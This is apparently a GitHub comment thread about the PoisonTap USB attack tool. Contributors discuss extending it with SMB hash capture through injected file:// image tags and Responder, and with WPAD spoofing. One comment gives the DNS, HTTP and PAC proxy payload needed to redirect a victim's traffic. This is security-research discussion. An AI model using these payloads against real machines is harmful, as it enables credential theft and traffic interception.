Comments (7)
just wanted to say i love your work!
from poisontap.
@Oneiroi @samyk
Although this discussion is a bit outdated: Unfortunately the WPAD Auth attack hasn't been working since MS16-112 and never worked on non-domain-joined boxes. But with the approach of @samyk something new comes to mind:
As code could be injected into nearly every HTTP response, something like <img src="file://PoisonTapIP/"> would initiate a request to an SMB share. If the SMB server were backed by Responder, NTLM hashes of Windows machines would be captured (with known challenge) and could be cracked offline. Right now I'm working on exactly this and had to extend some Responder features which are pending in a PR (see issue here for details).
The project isn't ready to be released, but right now I'm already able to do some nifty things, which maybe could be nice features for PoisonTap, too. These are:
- Providing a Plug'n'Play RNDIS device to most Windows 7/8/10 hosts (no manual driver installation)
- Providing a CDC ECM interface to Linux
- Runtime detection of active interface and thus single DHCP config for both, ECM and RNDIS
- HTTP request pawning, based on @samyk approach of 1 Bit netmask
As I'm using a hand-built composite gadget I plan to add in HID support, which needs testing, as I don't want to destroy the Plug'n'Play capability.
So as the needed Responder patches are already sent with a PR, you're maybe interested.
Another idea is to use nmap for target OS discovery, with the shortcoming of raising the boot time of the Pi, so this has to be tested, too.
from poisontap.
Great idea! I haven't tried it, but agree supporting WPAD on the DHCP and DNS server would be great... in fact, by injecting a PAC, you could then get the user to send all of their HTTPS URLs back to the attacker.
from poisontap.
You just need to answer DNS A requests for WPAD.*
With an http server listening at the IP and responding to GET requests for /wpad.dat
Respond with content-type set to: application/x-ns-proxy-autoconfig
and the PAC:
function FindProxyForURL(url, host){ return 'PROXY proxyhost:3141; DIRECT'; }
You could also force NTLM authentication when the wpad is requested and other fun things. https://github.com/lgandx/Responder
from poisontap.
The reason I mention DHCP is that A) typically the WPAD DNS request is only done on browser startup in my understanding and in our case the browser is already open, and B) it's possible the DNS server is pointing to a local IP, meaning PoisonTap will never see those WPAD DNS requests (PoisonTap can only then interfere with the HTTP communication to the public IPs that are ultimately resolved by the internal DNS server), however PoisonTap does still have the ability to include WPAD during the DHCP response.
from poisontap.
Presumably you have seen the work from mubix (https://room362.com/post/2016/snagging-creds-from-locked-machines/)? That uses WPAD via Responder (https://github.com/SpiderLabs/Responder) to carry out the attack.
from poisontap.
I'm still cleaning my scripts to bring my (now called P4wnP1) project online. I want to kindly ask you to review the "Modification to PoisonTap approach of fetching traffic to the whole IPv4 address range" section of my README, because I want to make sure you don't have any implications with it.
from poisontap.